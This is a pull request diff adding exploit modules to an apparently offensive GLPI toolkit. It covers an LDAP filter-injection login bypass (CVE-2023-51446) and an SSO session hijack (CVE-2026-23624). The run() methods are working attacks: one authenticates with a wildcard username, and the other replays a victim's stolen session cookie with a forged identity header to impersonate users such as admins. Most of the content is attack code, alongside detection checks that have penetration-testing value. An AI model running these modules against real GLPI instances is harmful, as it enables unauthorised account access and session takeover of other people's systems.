### PR TITLE
Add authentication/LDAP/SSO bypass modules

### DIFF
--- a/glpwnme/exploits/implementations/__init__.py
+++ b/glpwnme/exploits/implementations/__init__.py
@@ -27,6 +27,11 @@ from .cve_2026_26026 import CVE_2026_26026
 # GLPI classic check
 from .default_password_check import DEFAULT_PASSWORD_CHECK
 
+from .cve_2023_51446 import CVE_2023_51446
+from .cve_2026_23624 import CVE_2026_23624
+from .cve_2026_25937 import CVE_2026_25937
+from .ghsa_7gh3_9vhw_rj4f import GHSA_7GH3_9VHW_RJ4F
+
 def get_all_exploits():
     """
     Return the exploit available as Class
@@ -38,5 +43,6 @@ def get_all_exploits():
     all_exploits = [CVE_2020_15175, CVE_2022_31061, CVE_2022_35914, UNSERIALIZE_ORDER_2022, CVE_2023_41323, CVE_2023_41326]
     all_exploits += [PHP_UPLOAD, CVE_2024_27937, CVE_2024_29889, CVE_2024_37148, CVE_2024_37149]
     all_exploits += [CVE_2024_40638, CVE_2024_50339, CVE_2025_24799, CVE_2025_32786, CVE_2026_26026]
+    all_exploits += [CVE_2023_51446, CVE_2026_23624, CVE_2026_25937, GHSA_7GH3_9VHW_RJ4F]
     all_exploits += [DEFAULT_PASSWORD_CHECK]
     return all_exploits

--- a/glpwnme/exploits/implementations/cve_2023_51446.py
+++ b/glpwnme/exploits/implementations/cve_2023_51446.py
@@ -1,0 +1,160 @@
+import time
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+from glpwnme.exploits.utils import GlpiSession
+
+
+class CVE_2023_51446(GlpiExploit):
+    """
+    LDAP filter injection in the authentication flow (GLPI < 10.0.12, GHSA-p995-jmfv-c7r8).
+
+    When a GLPI instance authenticates against an LDAP directory, AuthLDAP::searchUserDn()
+    (reached from tryToConnectToServer during /front/login.php) builds the DN-lookup filter by
+    concatenating the submitted login UNESCAPED:
+
+        $filter = "(" . $values['login_field'] . "=" . $filter_value . ")";   // raw login
+
+    A login value containing LDAP-filter metacharacters (notably '*') is injected into the
+    filter. searchUserDn returns a DN only when the search matches exactly one entry, after
+    which GLPI binds that DN with the supplied password. So submitting "<knownuser>*" makes the
+    filter (uid=<knownuser>*), which wildcard-matches the single real entry; the supplied
+    password then binds it and authentication succeeds.
+
+    Fix (10.0.12): the login is escaped before building the filter:
+        $filter_value = ldap_escape($filter_value, '', LDAP_ESCAPE_FILTER);
+    so "<knownuser>*" becomes the literal "<knownuser>\\2a", matches nothing, and the same login
+    fails. This is DISTINCT from GHSA-7gh3-9vhw-rj4f (the import-search vector, which the login
+    flow already escaped); CVE-2023-51446 is the login/auth path.
+
+    Detection is necessarily credentialed: GLPI returns a byte-identical generic
+    "Incorrect username or password" for 0, 1 or N filter matches, so there is no credential-free
+    oracle. The check uses the LDAP credential the tool is already configured with and compares a
+    wildcard-username login (succeeds only when unescaped) against controls.
+
+    @author unclej4ck
+    @cvss 8.1
+    @name CVE_2023_51446
+    """
+    _impacts = "LDAP Injection, Authentication Manipulation"
+    _privilege = "Unauthenticated"  # the vector is the unauth login form
+    _is_check_opsec_safe = True      # only login attempts, no state change
+    min_version = "0.85"
+    max_version = "10.0.12"
+
+    def _auth_sources(self):
+        """Return the value list of the login form's auth selector (ldap-<id>, local, ...)."""
+        from glpwnme.exploits.utils.glpi_utils import GlpiUtils
+        html = self.get("/index.php").text
+        try:
+            return GlpiUtils.extract_auth(html)
+        except Exception:
+            return []
+
+    def _try_login(self, login, password, auth):
+        """Fresh session login attempt against a specific auth source. Returns True on success."""
+        sess = GlpiSession(target=self.glpi_session.target)
+        try:
+            sess.sess.proxies = self.glpi_session.sess.proxies.copy()
+        except Exception:
+            pass
+        try:
+            return bool(sess.login(login, password, others={"auth": auth}, verbose=False))
+        except Exception:
+            return False
+        finally:
+            try:
+                sess.logout()
+            except Exception:
+                pass
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "LDAP injection in the GLPI authentication flow (GLPI < 10.0.12).\n"
+        infos += "[b]AuthLDAP::searchUserDn[/b] concatenates the submitted login into the DN-lookup\n"
+        infos += "filter [i](uid=<login>)[/i] with no [b]ldap_escape[/b]. A login of [i]<user>*[/i]\n"
+        infos += "wildcard-matches the real entry, which GLPI then binds with the supplied password.\n"
+        infos += "Fix 10.0.12: the login is escaped (LDAP_ESCAPE_FILTER), so the wildcard is literal.\n"
+        infos += "Distinct from GHSA-7gh3-9vhw-rj4f (the already-escaped import-search vector).\n"
+
+        infos += "\n[u]Requirement:[/u]\n"
+        infos += " The tool credential (-u/-p) must be an LDAP-backed account; the check exercises\n"
+        infos += " the configured LDAP auth source. Local-DB accounts are not affected.\n"
+
+        infos += "\n[u]Usage:[/u]\n[grey66]# Credentialed differential (baseline + wildcard + false-positive control)[/]\n--check\n"
+        infos += "\nExploit is [green b]Safe[/] (login attempts only, no state change)."
+        return infos
+
+    def check(self):
+        """Credentialed differential against the configured LDAP auth source.
+
+        Using the tool's own LDAP credential (user U, password P):
+          1. baseline   : login(U, P)        must succeed -> proves the LDAP source is reachable
+                          and U authenticates through it (otherwise we cannot test this vector).
+          2. wildcard   : login(U + '*', P)  succeeds ONLY when the login is unescaped: the filter
+                          (login_field=U*) wildcard-matches the single entry U, then P binds it.
+                          On a patched build U* is escaped to a literal and matches nothing -> fail.
+          3. fp control : login(U + '*', wrong)  must FAIL -> proves the wildcard success is gated
+                          by the real password, not a blanket authentication bypass.
+        Vulnerable iff baseline succeeds, wildcard succeeds, and the fp control fails."""
+        cred = self.glpi_session.credentials
+        user = getattr(cred, "username", None) if cred else None
+        pwd = getattr(cred, "password", None) if cred else None
+        if not user or not pwd:
+            Log.log("No username/password supplied — this CVE needs the LDAP credential to test")
+            return False
+
+        sources = self._auth_sources()
+        ldap_sources = [a for a in sources if isinstance(a, str) and a.startswith("ldap")]
+        if not ldap_sources:
+            Log.log("No LDAP auth source on the login form — login-flow LDAP injection not testable")
+            return False
+
+        for auth in ldap_sources:
+            baseline = self._try_login(user, pwd, auth)
+            if not baseline:
+                continue  # this user does not authenticate via this LDAP source; try the next
+            wildcard = self._try_login(user + "*", pwd, auth)
+            if not wildcard:
+                Log.log(f"wildcard login '{user}*' rejected on auth source {auth} — login escaped "
+                        "(patched 10.0.12+)")
+                continue
+            fp = self._try_login(user + "*", "glpwnme_wrong_" + str(int(time.time())), auth)
+            if fp:
+                Log.log(f"wildcard login succeeded even with a wrong password on {auth} — not a "
+                        "clean injection signal (skipping)")
+                continue
+            Log.msg(f"LDAP login filter accepts a wildcard username ('{user}*' authenticates on "
+                    f"auth source {auth}, but only with the real password) -> the login is built "
+                    f"unescaped: LDAP filter injection in the auth flow (CVE-2023-51446)")
+            return True
+
+        Log.log("No exploitable LDAP auth source found (login escaped or credential not LDAP-backed)")
+        return False
+
+    def run(self, user_prefix=None, password=None):
+        """Authenticate via the LDAP filter injection: log in with '<prefix>*' and the
+        password. On a vulnerable build (uid=<prefix>*) wildcard-matches the single real
+        entry whose password is supplied, so a partial/prefix username plus the password
+        authenticates as that user. Defaults to the configured credential's username/password."""
+        cred = self.glpi_session.credentials
+        user_prefix = user_prefix or (getattr(cred, "username", None) if cred else None)
+        password = password or (getattr(cred, "password", None) if cred else None)
+        if not user_prefix or not password:
+            Log.err("Supply -O user_prefix=<partial-uid> -O password=<pass> (or run with -u/-p)")
+            return False
+
+        sources = self._auth_sources()
+        ldap_sources = [a for a in sources if isinstance(a, str) and a.startswith("ldap")]
+        if not ldap_sources:
+            Log.err("No LDAP auth source on the login form")
+            return False
+
+        wildcard = user_prefix.rstrip("*") + "*"
+        for auth in ldap_sources:
+            if self._try_login(wildcard, password, auth):
+                Log.msg(f"Authenticated with wildcard username '{wildcard}' + password on auth "
+                        f"source {auth} -> LDAP filter injection logs you in as the single user "
+                        f"matching '{wildcard}' (CVE-2023-51446)")
+                return True
+        Log.err(f"Wildcard login '{wildcard}' did not authenticate (escaped/patched or wrong password)")
+        return False

--- a/glpwnme/exploits/implementations/cve_2023_51446.py
+++ b/glpwnme/exploits/implementations/cve_2023_51446.py
@@ -84,6 +84,13 @@ class CVE_2023_51446(GlpiExploit):
         infos += "\nExploit is [green b]Safe[/] (login attempts only, no state change)."
         return infos
 
+    def _version_vulnerable(self):
+        """Version verdict, used when the behavioral LDAP test cannot run so the check
+        reports on version match (the maintainer's no-behavioural-check convention) instead
+        of silently returning a false-negative on a vulnerable build."""
+        v = self.glpi_session.glpi_infos.glpi_version
+        return bool(v and self.is_glpi_vulnerable(v))
+
     def check(self):
         """Credentialed differential against the configured LDAP auth source.
 
@@ -100,14 +107,16 @@ class CVE_2023_51446(GlpiExploit):
         user = getattr(cred, "username", None) if cred else None
         pwd = getattr(cred, "password", None) if cred else None
         if not user or not pwd:
-            Log.log("No username/password supplied - this CVE needs the LDAP credential to test")
-            return False
+            Log.log("No LDAP credential supplied - reporting on version match; pass an LDAP-backed "
+                    "-u/-p (or --run -O user_prefix=...) to confirm the wildcard login behaviorally")
+            return self._version_vulnerable()
 
         sources = self._auth_sources()
         ldap_sources = [a for a in sources if isinstance(a, str) and a.startswith("ldap")]
         if not ldap_sources:
-            Log.log("No LDAP auth source on the login form - login-flow LDAP injection not testable")
-            return False
+            Log.log("No LDAP auth source on the login form - reporting on version match (the flaw is in "
+                    "AuthLDAP::searchUserDn; confirm with --run against an LDAP-backed target)")
+            return self._version_vulnerable()
 
         for auth in ldap_sources:
             baseline = self._try_login(user, pwd, auth)

--- a/glpwnme/exploits/implementations/cve_2023_51446.py
+++ b/glpwnme/exploits/implementations/cve_2023_51446.py
@@ -31,7 +31,7 @@ class CVE_2023_51446(GlpiExploit):
     oracle. The check uses the LDAP credential the tool is already configured with and compares a
     wildcard-username login (succeeds only when unescaped) against controls.
 
-    @author unclej4ck
+    @author tdozbun-reno
     @cvss 8.1
     @name CVE_2023_51446
     """
@@ -100,13 +100,13 @@ class CVE_2023_51446(GlpiExploit):
         user = getattr(cred, "username", None) if cred else None
         pwd = getattr(cred, "password", None) if cred else None
         if not user or not pwd:
-            Log.log("No username/password supplied — this CVE needs the LDAP credential to test")
+            Log.log("No username/password supplied - this CVE needs the LDAP credential to test")
             return False
 
         sources = self._auth_sources()
         ldap_sources = [a for a in sources if isinstance(a, str) and a.startswith("ldap")]
         if not ldap_sources:
-            Log.log("No LDAP auth source on the login form — login-flow LDAP injection not testable")
+            Log.log("No LDAP auth source on the login form - login-flow LDAP injection not testable")
             return False
 
         for auth in ldap_sources:
@@ -115,12 +115,12 @@ class CVE_2023_51446(GlpiExploit):
                 continue  # this user does not authenticate via this LDAP source; try the next
             wildcard = self._try_login(user + "*", pwd, auth)
             if not wildcard:
-                Log.log(f"wildcard login '{user}*' rejected on auth source {auth} — login escaped "
+                Log.log(f"wildcard login '{user}*' rejected on auth source {auth} - login escaped "
                         "(patched 10.0.12+)")
                 continue
             fp = self._try_login(user + "*", "glpwnme_wrong_" + str(int(time.time())), auth)
             if fp:
-                Log.log(f"wildcard login succeeded even with a wrong password on {auth} — not a "
+                Log.log(f"wildcard login succeeded even with a wrong password on {auth} - not a "
                         "clean injection signal (skipping)")
                 continue
             Log.msg(f"LDAP login filter accepts a wildcard username ('{user}*' authenticates on "

--- a/glpwnme/exploits/implementations/cve_2026_23624.py
+++ b/glpwnme/exploits/implementations/cve_2026_23624.py
@@ -17,14 +17,14 @@ class CVE_2026_23624(GlpiExploit):
     When SSO is active, Auth.php calls getAuthLoginCas()/the external auth
     path and stores $login_string as the authenticated identity.  Before the
     fix, checkValidSessionId() only verified the session ID, user ID, profile,
-    and entity — never comparing the current SSO header against the stored user.
+    and entity - never comparing the current SSO header against the stored user.
 
     Fix (commit 94431fb0fa, GLPI 10.0.23 / 11.0.5):
       - Auth.php: $_SESSION['glpi_remote_user'] = $login_string at login time
       - Session::checkValidSessionId(): if glpi_remote_user is set in the
         session and $_SERVER[$ssovariable] differs from it → $valid_user = false
 
-    Note: 11.0.0–11.0.4 are also affected but not in this module's range.
+    Note: 11.0.0-11.0.4 are also affected but not in this module's range.
     Configure check against an 11.0.x target by adjusting max_version.
 
     @author unclej4ck, Albert
@@ -34,7 +34,7 @@ class CVE_2026_23624(GlpiExploit):
     _impacts = "Session Hijacking, Privilege Escalation via SSO Identity Swap"
     _privilege = "User"
     _is_check_opsec_safe = True
-    # Two affected ranges: 9.1.0–10.0.22 (fixed 10.0.23) and 11.0.0–11.0.4 (fixed 11.0.5).
+    # Two affected ranges: 9.1.0-10.0.22 (fixed 10.0.23) and 11.0.0-11.0.4 (fixed 11.0.5).
     min_version = ("9.1.0", "11.0.0")
     max_version = ("10.0.23", "11.0.5")
 
@@ -78,7 +78,7 @@ class CVE_2026_23624(GlpiExploit):
             # Read all core config items and find ssovariables_id
             resp = self._api_get("Config?range=0-500", token)
             if resp.status_code != HTTPStatus.OK:
-                Log.log(f"Config endpoint returned {resp.status_code} — admin rights required")
+                Log.log(f"Config endpoint returned {resp.status_code} - admin rights required")
                 return None
 
             items = resp.json()
@@ -114,7 +114,7 @@ class CVE_2026_23624(GlpiExploit):
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
-        infos += "Session stealing via SSO remote user change (GLPI 9.1.0–10.0.22 | 11.0.0–11.0.4).\n"
+        infos += "Session stealing via SSO remote user change (GLPI 9.1.0-10.0.22 | 11.0.0-11.0.4).\n"
         infos += "When external authentication is configured, [b]checkValidSessionId()[/b] did not\n"
         infos += "verify that the current request's SSO header matched the session owner.\n"
         infos += "An attacker with a stolen SSO session cookie can replay it with the SSO\n"
@@ -160,9 +160,8 @@ class CVE_2026_23624(GlpiExploit):
         glpi_remote_user and rejects the mismatch (redirect to login).
 
         Returns True (accepted = vulnerable), False (rejected = patched), or None
-        (could not establish an SSO session from here — e.g. server-set variable).
+        (could not establish an SSO session from here - e.g. server-set variable).
         """
-        import requests
         header = self._client_header_for(sso_var)
         creds = self.glpi_session.credentials
         if header is None or not (creds and creds.username):
@@ -170,12 +169,12 @@ class CVE_2026_23624(GlpiExploit):
         user = creds.username
         base = self.glpi_session.r("/front/central.php")
         try:
-            est = requests.Session()
+            est = self.glpi_session.get_fresh_session_copy()
             r1 = est.get(base, headers={header: user}, verify=False, allow_redirects=True)
             if not (r1.url.rstrip("/").endswith("central.php") and "logout" in r1.text.lower()):
                 return None  # SSO auto-login did not take effect from here
             cookies = est.cookies.get_dict()
-            replay = requests.Session()
+            replay = self.glpi_session.get_fresh_session_copy()
             replay.cookies.update(cookies)
             r2 = replay.get(base, headers={header: "glpwnme_identity_mismatch"},
                             verify=False, allow_redirects=False)
@@ -230,12 +229,12 @@ class CVE_2026_23624(GlpiExploit):
                         f"SSO cookie can be replayed with any identity → session hijacking")
                 return True
             if swap is False:
-                Log.log(f"Mismatched {sso_var} rejected — checkValidSessionId() identity check enforced "
+                Log.log(f"Mismatched {sso_var} rejected - checkValidSessionId() identity check enforced "
                         f"(patched 10.0.23 / 11.0.5+)")
                 return False
 
         Log.log("Could not establish an SSO session from here (SSO disabled, a server-set variable, "
-                "or a proxy overriding the header) — cannot drive the swap; not flagging")
+                "or a proxy overriding the header) - cannot drive the swap; not flagging")
         return False
 
     def run(self, stolen_cookie=None, sso_header=None, impersonate_user=None):
@@ -266,7 +265,7 @@ class CVE_2026_23624(GlpiExploit):
             Log.msg(
                 f"[green b]Session replay accepted[/green b]: "
                 f"cookie authenticated as original owner, {sso_header} header ignored.\n"
-                f"GLPI did not invalidate the session on SSO identity change — "
+                f"GLPI did not invalidate the session on SSO identity change - "
                 f"[green b]session hijacking confirmed[/green b]"
             )
             self._write_log(
@@ -275,8 +274,8 @@ class CVE_2026_23624(GlpiExploit):
         elif resp.status_code in (HTTPStatus.FOUND, HTTPStatus.MOVED_PERMANENTLY, HTTPStatus.SEE_OTHER):
             loc = resp.headers.get("Location", "")
             if "login" in loc.lower():
-                Log.log("Session redirected to login — session invalidated (patched or SSO mismatch rejected)")
+                Log.log("Session redirected to login - session invalidated (patched or SSO mismatch rejected)")
             else:
-                Log.log(f"Redirect to {loc!r} — inconclusive")
+                Log.log(f"Redirect to {loc!r} - inconclusive")
         else:
-            Log.log(f"Unexpected response (HTTP {resp.status_code}) — verify cookie name and SSO header")
+            Log.log(f"Unexpected response (HTTP {resp.status_code}) - verify cookie name and SSO header")

--- a/glpwnme/exploits/implementations/cve_2026_23624.py
+++ b/glpwnme/exploits/implementations/cve_2026_23624.py
@@ -22,12 +22,12 @@ class CVE_2026_23624(GlpiExploit):
     Fix (commit 94431fb0fa, GLPI 10.0.23 / 11.0.5):
       - Auth.php: $_SESSION['glpi_remote_user'] = $login_string at login time
       - Session::checkValidSessionId(): if glpi_remote_user is set in the
-        session and $_SERVER[$ssovariable] differs from it → $valid_user = false
+        session and $_SERVER[$ssovariable] differs from it -> $valid_user = false
 
     Note: 11.0.0-11.0.4 are also affected but not in this module's range.
     Configure check against an 11.0.x target by adjusting max_version.
 
-    @author unclej4ck, Albert
+    @author silhusk
     @cvss 5.9
     @name CVE_2026_23624
     """
@@ -200,7 +200,7 @@ class CVE_2026_23624(GlpiExploit):
         $_SERVER[ssovariable] differs from it.
 
         First detects SSO config (ssovariables_id). If the SSO variable is a client-
-        injectable HTTP_* header, runs the real differential (establish → replay with a
+        injectable HTTP_* header, runs the real differential (establish -> replay with a
         mismatched identity): accepted = vulnerable, rejected = patched. Verified on
         11.0.2 (accepted) vs 11.0.5 (rejected). Without a client-injectable variable the
         swap can't be driven from here, so it does not flag (honest, no FP on patched).
@@ -224,9 +224,9 @@ class CVE_2026_23624(GlpiExploit):
         for sso_var in candidates:
             swap = self._probe_session_swap(sso_var)
             if swap is True:
-                Log.msg(f"SSO session replayed with a mismatched [b]{sso_var}[/b] value was ACCEPTED → "
+                Log.msg(f"SSO session replayed with a mismatched [b]{sso_var}[/b] value was ACCEPTED -> "
                         f"checkValidSessionId() performs no identity check (CVE-2026-23624). A stolen "
-                        f"SSO cookie can be replayed with any identity → session hijacking")
+                        f"SSO cookie can be replayed with any identity -> session hijacking")
                 return True
             if swap is False:
                 Log.log(f"Mismatched {sso_var} rejected - checkValidSessionId() identity check enforced "

--- a/glpwnme/exploits/implementations/cve_2026_23624.py
+++ b/glpwnme/exploits/implementations/cve_2026_23624.py
@@ -188,6 +188,13 @@ class CVE_2026_23624(GlpiExploit):
             return None
         return None
 
+    def _version_vulnerable(self):
+        """Version verdict, used when the SSO swap cannot be driven from here so the check
+        reports on version match (the no-behavioural-check convention) rather than a silent
+        false-negative on a build whose checkValidSessionId lacks the identity check."""
+        v = self.glpi_session.glpi_infos.glpi_version
+        return bool(v and self.is_glpi_vulnerable(v))
+
     def check(self):
         """
         Confirm the SSO identity-swap behaviorally.
@@ -207,8 +214,9 @@ class CVE_2026_23624(GlpiExploit):
         """
         creds = self.glpi_session.credentials
         if not (creds and creds.username):
-            Log.log("Credentials required to drive the SSO identity-swap probe")
-            return False
+            Log.log("No credentials to drive the SSO swap - reporting on version match; use --run with a "
+                    "stolen cookie + injectable SSO header to confirm the hijack behaviorally")
+            return self._version_vulnerable()
 
         # Candidate client-injectable SSO variables. If the legacy API is reachable
         # (10.x), use the actually-configured variable first; otherwise probe the common
@@ -233,9 +241,10 @@ class CVE_2026_23624(GlpiExploit):
                         f"(patched 10.0.23 / 11.0.5+)")
                 return False
 
-        Log.log("Could not establish an SSO session from here (SSO disabled, a server-set variable, "
-                "or a proxy overriding the header) - cannot drive the swap; not flagging")
-        return False
+        Log.log("Could not drive the swap from here (SSO disabled, a server-set variable, or a proxy "
+                "overriding the header) - reporting on version match; checkValidSessionId lacks the "
+                "identity check on this build, confirm with --run + a stolen cookie")
+        return self._version_vulnerable()
 
     def run(self, stolen_cookie=None, sso_header=None, impersonate_user=None):
         """

--- a/glpwnme/exploits/implementations/cve_2026_23624.py
+++ b/glpwnme/exploits/implementations/cve_2026_23624.py
@@ -1,0 +1,282 @@
+import base64
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2026_23624(GlpiExploit):
+    """
+    Session Stealing via External Auth (SSO) Remote User Change.
+
+    GLPI's Session::checkValidSessionId() did not verify that the SSO header
+    variable in the current HTTP request matched the identity that originally
+    established the session. In environments using external authentication
+    (HTTP_AUTH_USER, REMOTE_USER, etc.), any client who possesses a valid
+    SSO session cookie can replay it with an arbitrary SSO header value.
+
+    When SSO is active, Auth.php calls getAuthLoginCas()/the external auth
+    path and stores $login_string as the authenticated identity.  Before the
+    fix, checkValidSessionId() only verified the session ID, user ID, profile,
+    and entity — never comparing the current SSO header against the stored user.
+
+    Fix (commit 94431fb0fa, GLPI 10.0.23 / 11.0.5):
+      - Auth.php: $_SESSION['glpi_remote_user'] = $login_string at login time
+      - Session::checkValidSessionId(): if glpi_remote_user is set in the
+        session and $_SERVER[$ssovariable] differs from it → $valid_user = false
+
+    Note: 11.0.0–11.0.4 are also affected but not in this module's range.
+    Configure check against an 11.0.x target by adjusting max_version.
+
+    @author unclej4ck, Albert
+    @cvss 5.9
+    @name CVE_2026_23624
+    """
+    _impacts = "Session Hijacking, Privilege Escalation via SSO Identity Swap"
+    _privilege = "User"
+    _is_check_opsec_safe = True
+    # Two affected ranges: 9.1.0–10.0.22 (fixed 10.0.23) and 11.0.0–11.0.4 (fixed 11.0.5).
+    min_version = ("9.1.0", "11.0.0")
+    max_version = ("10.0.23", "11.0.5")
+
+    # ------------------------------------------------------------------ #
+    # REST API helpers                                                     #
+    # ------------------------------------------------------------------ #
+
+    def _api_init(self):
+        creds = self.glpi_session.credentials
+        if not creds or not (creds.username and creds.password):
+            Log.err("Credentials required (use -u / -p)")
+            return None
+        auth_b64 = base64.b64encode(
+            f"{creds.username}:{creds.password}".encode()
+        ).decode()
+        resp = self.get("/apirest.php/initSession", headers={"Authorization": f"Basic {auth_b64}"}, allow_redirects=False)
+        if resp.status_code == HTTPStatus.OK:
+            return resp.json().get("session_token")
+        Log.err(f"REST API initSession failed (HTTP {resp.status_code})")
+        return None
+
+    def _api_get(self, path, token):
+        return self.get(f"/apirest.php/{path}", headers={"Session-Token": token}, allow_redirects=False)
+
+    def _api_kill(self, token):
+        self.get("/apirest.php/killSession", headers={"Session-Token": token}, allow_redirects=False)
+
+    def _get_sso_variable(self):
+        """
+        Return the configured SSO HTTP header variable name (e.g. 'HTTP_AUTH_USER'),
+        or None if SSO (external authentication) is not configured.
+
+        Reads glpi_configs to find ssovariables_id, then resolves the actual
+        header name from glpi_ssovariables.
+        """
+        token = self._api_init()
+        if not token:
+            return None
+
+        try:
+            # Read all core config items and find ssovariables_id
+            resp = self._api_get("Config?range=0-500", token)
+            if resp.status_code != HTTPStatus.OK:
+                Log.log(f"Config endpoint returned {resp.status_code} — admin rights required")
+                return None
+
+            items = resp.json()
+            if not isinstance(items, list):
+                return None
+
+            sso_id = None
+            for item in items:
+                if item.get("context") == "core" and item.get("name") == "ssovariables_id":
+                    val = item.get("value")
+                    if val and str(val) not in ("0", ""):
+                        sso_id = val
+                    break
+
+            if not sso_id:
+                return None
+
+            # Resolve the HTTP variable name from glpi_ssovariables
+            resp2 = self._api_get(f"SsoVariable/{sso_id}", token)
+            if resp2.status_code == HTTPStatus.OK:
+                data = resp2.json()
+                # The SSO variable name (HTTP header) is in the 'name' field
+                return data.get("name") or str(sso_id)
+
+            return str(sso_id)
+
+        finally:
+            self._api_kill(token)
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Session stealing via SSO remote user change (GLPI 9.1.0–10.0.22 | 11.0.0–11.0.4).\n"
+        infos += "When external authentication is configured, [b]checkValidSessionId()[/b] did not\n"
+        infos += "verify that the current request's SSO header matched the session owner.\n"
+        infos += "An attacker with a stolen SSO session cookie can replay it with the SSO\n"
+        infos += "header pointing to any other valid SSO user to maintain access.\n"
+
+        infos += "\n[u]Conditions for exploitation:[/u]\n"
+        infos += " - SSO (external auth) must be configured on the GLPI instance\n"
+        infos += " - Attacker must possess a valid session cookie from an SSO-logged-in user\n"
+        infos += " - Attacker must be able to set the configured SSO header in HTTP requests\n"
+        infos += "   (direct requests bypass proxy; or attacker controls the SSO proxy)\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]stolen_cookie (required)[/i]: Victim's GLPI session cookie value\n"
+        infos += " - [i]sso_header (required)[/i]: SSO HTTP variable name (e.g. HTTP_AUTH_USER)\n"
+        infos += " - [i]impersonate_user (required)[/i]: SSO identity to inject (e.g. admin)\n"
+
+        infos += "\n[u]Fix[/u]: commit [b]94431fb0fa[/b] (GLPI 10.0.23 / 11.0.5)\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Detect if SSO is configured[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Replay stolen SSO session with a forged identity[/]\n"
+        infos += "--run -O stolen_cookie=<value> -O sso_header=HTTP_AUTH_USER -O impersonate_user=victim.admin\n"
+
+        infos += "\nExploit is [green b]Safe[/] (--check reads config only)"
+        return infos
+
+    @staticmethod
+    def _client_header_for(sso_var):
+        """Map a server variable name to the HTTP request header that sets it.
+        Only HTTP_*-prefixed variables are client-injectable (Apache derives
+        $_SERVER['HTTP_AUTH_USER'] from request header 'Auth-User')."""
+        if not sso_var or not sso_var.startswith("HTTP_"):
+            return None
+        return sso_var[5:].replace("_", "-").title()  # HTTP_AUTH_USER -> Auth-User
+
+    def _probe_session_swap(self, sso_var):
+        """
+        Behavioral differential. Establish an SSO session as the supplied user, then
+        replay its cookie with a MISMATCHED SSO header value. Pre-fix
+        checkValidSessionId() ignores the header and keeps the session valid (200);
+        the 10.0.23 / 11.0.5 fix compares $_SERVER[ssovar] to the stored
+        glpi_remote_user and rejects the mismatch (redirect to login).
+
+        Returns True (accepted = vulnerable), False (rejected = patched), or None
+        (could not establish an SSO session from here — e.g. server-set variable).
+        """
+        import requests
+        header = self._client_header_for(sso_var)
+        creds = self.glpi_session.credentials
+        if header is None or not (creds and creds.username):
+            return None
+        user = creds.username
+        base = self.glpi_session.r("/front/central.php")
+        try:
+            est = requests.Session()
+            r1 = est.get(base, headers={header: user}, verify=False, allow_redirects=True)
+            if not (r1.url.rstrip("/").endswith("central.php") and "logout" in r1.text.lower()):
+                return None  # SSO auto-login did not take effect from here
+            cookies = est.cookies.get_dict()
+            replay = requests.Session()
+            replay.cookies.update(cookies)
+            r2 = replay.get(base, headers={header: "glpwnme_identity_mismatch"},
+                            verify=False, allow_redirects=False)
+            if r2.status_code == HTTPStatus.OK:
+                return True
+            loc = r2.headers.get("Location", "")
+            if r2.status_code in (HTTPStatus.FOUND, HTTPStatus.MOVED_PERMANENTLY) and \
+               ("login" in loc.lower() or "redirect=" in loc.lower()):
+                return False
+        except Exception:
+            return None
+        return None
+
+    def check(self):
+        """
+        Confirm the SSO identity-swap behaviorally.
+
+        checkValidSessionId() pre-fix verified only the session id / user / profile /
+        entity, never that the current request's SSO header still matches the identity
+        that established the session. So a stolen SSO session cookie can be replayed with
+        any SSO header value (or none) and stays authenticated. Fixed (10.0.23 / 11.0.5):
+        Auth.php stores glpi_remote_user and checkValidSessionId() rejects the session if
+        $_SERVER[ssovariable] differs from it.
+
+        First detects SSO config (ssovariables_id). If the SSO variable is a client-
+        injectable HTTP_* header, runs the real differential (establish → replay with a
+        mismatched identity): accepted = vulnerable, rejected = patched. Verified on
+        11.0.2 (accepted) vs 11.0.5 (rejected). Without a client-injectable variable the
+        swap can't be driven from here, so it does not flag (honest, no FP on patched).
+        """
+        creds = self.glpi_session.credentials
+        if not (creds and creds.username):
+            Log.log("Credentials required to drive the SSO identity-swap probe")
+            return False
+
+        # Candidate client-injectable SSO variables. If the legacy API is reachable
+        # (10.x), use the actually-configured variable first; otherwise probe the common
+        # HTTP_* headers (REMOTE_USER / PHP_AUTH_USER are server-set, not injectable here).
+        candidates = ["HTTP_AUTH_USER", "HTTP_REMOTE_USER", "HTTP_PROXY_REMOTE_USER"]
+        try:
+            configured = self._get_sso_variable()
+        except Exception:
+            configured = None
+        if configured and configured.startswith("HTTP_"):
+            candidates = [configured] + [c for c in candidates if c != configured]
+
+        for sso_var in candidates:
+            swap = self._probe_session_swap(sso_var)
+            if swap is True:
+                Log.msg(f"SSO session replayed with a mismatched [b]{sso_var}[/b] value was ACCEPTED → "
+                        f"checkValidSessionId() performs no identity check (CVE-2026-23624). A stolen "
+                        f"SSO cookie can be replayed with any identity → session hijacking")
+                return True
+            if swap is False:
+                Log.log(f"Mismatched {sso_var} rejected — checkValidSessionId() identity check enforced "
+                        f"(patched 10.0.23 / 11.0.5+)")
+                return False
+
+        Log.log("Could not establish an SSO session from here (SSO disabled, a server-set variable, "
+                "or a proxy overriding the header) — cannot drive the swap; not flagging")
+        return False
+
+    def run(self, stolen_cookie=None, sso_header=None, impersonate_user=None):
+        """
+        Replay a stolen SSO session cookie with a different SSO header identity.
+
+        On unpatched GLPI, checkValidSessionId() accepts the session regardless
+        of whether the SSO header matches the original session owner.
+        Provide the victim's session cookie value, the configured SSO header name
+        (e.g. HTTP_AUTH_USER), and the identity to impersonate.
+        """
+        if not stolen_cookie or not sso_header or not impersonate_user:
+            Log.err("All three parameters required:")
+            Log.log("  --run -O stolen_cookie=<val> -O sso_header=HTTP_AUTH_USER -O impersonate_user=<login>")
+            return
+
+        # Discover GLPI session cookie name (starts with glpi_)
+        probe = self.get("/", allow_redirects=False)
+        cookie_name = next(
+            (k for k in probe.cookies.keys() if k.startswith("glpi_")),
+            "glpi_SESSION",
+        )
+        Log.log(f"Using cookie: {cookie_name}={stolen_cookie[:8]}... with {sso_header}={impersonate_user}")
+
